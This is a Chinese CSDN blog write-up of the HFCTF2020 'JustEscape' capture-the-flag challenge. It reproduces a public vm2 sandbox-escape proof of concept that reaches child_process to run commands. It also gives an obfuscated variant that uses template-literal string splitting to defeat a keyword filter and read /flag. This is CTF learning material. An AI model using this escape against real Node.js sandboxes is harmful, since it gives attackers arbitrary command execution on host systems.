[HFCTF2020]JustEscape

最新推荐文章于 2023-04-13 19:50:27 发布

fmyyy1

最新推荐文章于 2023-04-13 19:50:27 发布

阅读量1k

点赞数 3

分类专栏： # ctf做题记录沙箱逃逸 RCE 文章标签： ctf

本文链接：https://blog.csdn.net/fmyyy1/article/details/115665540

版权

ctf做题记录同时被 3 个专栏收录

49 篇文章 4 订阅

订阅专栏

RCE

11 篇文章 0 订阅

订阅专栏

沙箱逃逸

2 篇文章 0 订阅

订阅专栏

场景
在这里插入图片描述
最低行提示不是php，测试过后发现是nodejs。

是vm2的沙箱逃逸问题。
github上有现成的poc
https://github.com/patriksimek/vm2/issues/225


"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
    TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor("return process")();
    try{
        Object.preventExtensions(Buffer.from("")).a = 1;
    }catch(e){
        return e.get_process(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
    }
}+')()';
try{
    console.log(new VM().run(untrusted));
}catch(x){
    console.log(x);
}

本地测试。
在这里插入图片描述
本体存在关键字过滤，不能直接用。这里用javascript的模版文字绕过。
https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Template_literals
例如

prototype变成`${`${`prototyp`}e`}`

最后

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

在这里插入图片描述
参考
https://www.zhaoj.in/read-6512.html

fmyyy1

关注

3
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
[HFCTF2020]JustEscape

场景最低行提示不是php，测试过后发现是nodejs。是vm2的沙箱逃逸问题。github上有现成的pochttps://github.com/patriksimek/vm2/issues/225"use strict";const {VM} = require('vm2');const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
复制链接

扫一扫